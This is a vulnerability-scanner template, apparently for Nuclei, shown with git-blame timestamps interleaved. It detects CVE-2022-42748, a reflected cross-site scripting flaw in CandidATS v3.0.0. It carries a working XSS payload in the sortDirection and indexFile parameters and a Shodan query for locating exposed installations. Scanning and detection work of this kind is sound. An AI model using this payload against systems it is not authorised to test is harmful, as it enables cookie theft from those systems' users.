2022-11-04 13:23:57 +00:00
|
|
|
id: CVE-2022-42748
|
|
|
|
|
|
|
|
info:
|
|
|
|
name: CandidATS v3.0.0 - Cross Site Scripting.
|
|
|
|
author: arafatansari
|
|
|
|
severity: Medium
|
|
|
|
description: CandidATS v3.0.0 on 'sortDirection' of the 'ajax.php' resource, allows an external attacker to steal the cookie of arbitrary users.
|
|
|
|
reference:
|
|
|
|
- https://fluidattacks.com/advisories/modestep/
|
|
|
|
metadata:
|
|
|
|
shodan-query: http.html:"CandidATS"
|
|
|
|
verified: true
|
|
|
|
tags: xss,cve,2022
|
|
|
|
|
|
|
|
requests:
|
|
|
|
- method: GET
|
2022-11-04 13:25:38 +00:00
|
|
|
path:
|
2022-11-04 13:23:57 +00:00
|
|
|
- '{{BaseURL}}/ajax.php?f=getPipelineJobOrder&joborderID=50&page=0&entriesPerPage=15&sortBy=dateCreatedInt&sortDirection=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&indexFile=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&isPopup=0'
|
|
|
|
|
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
|
|
|
- type: word
|
|
|
|
part: body
|
|
|
|
words:
|
2022-11-04 13:28:04 +00:00
|
|
|
- '<script>alert(document.cookie)</script>'
|
|
|
|
|
2022-11-04 13:23:57 +00:00
|
|
|
condition: and
|
|
|
|
- type: status
|
|
|
|
status:
|
|
|
|
- 404
|